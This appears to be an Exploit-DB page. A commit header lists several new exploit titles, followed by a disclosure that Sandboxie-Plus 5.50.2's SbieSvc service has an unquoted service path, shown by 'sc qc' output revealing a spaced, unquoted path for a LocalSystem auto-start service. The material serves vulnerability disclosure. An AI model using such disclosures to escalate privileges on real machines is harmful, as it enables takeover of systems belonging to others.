88a02fb8d8
8 changes to exploits/shellcodes Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege BattlEye 0.9 - 'BEService' Unquoted Service Path WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
24 lines
No EOL
846 B
Text
24 lines
No EOL
846 B
Text
# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
|
|
# Exploit Author: Antonio Cuomo (arkantolo)
|
|
# Exploit Date: 2022-03-09
|
|
# Vendor : David Xanatos
|
|
# Version : SbieSvc 5.50.2
|
|
# Vendor Homepage : https://sandboxie-plus.com/
|
|
# Tested on OS: Windows 10 Pro x64
|
|
|
|
#PoC :
|
|
==============
|
|
|
|
C:\>sc qc SbieSvc
|
|
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
|
|
|
|
NOME_SERVIZIO: SbieSvc
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_AVVIO : 2 AUTO_START
|
|
CONTROLLO_ERRORE : 1 NORMAL
|
|
NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
|
|
GRUPPO_ORDINE_CARICAMENTO : UIGroup
|
|
TAG : 0
|
|
NOME_VISUALIZZATO : Sandboxie Service
|
|
DIPENDENZE :
|
|
SERVICE_START_NAME : LocalSystem |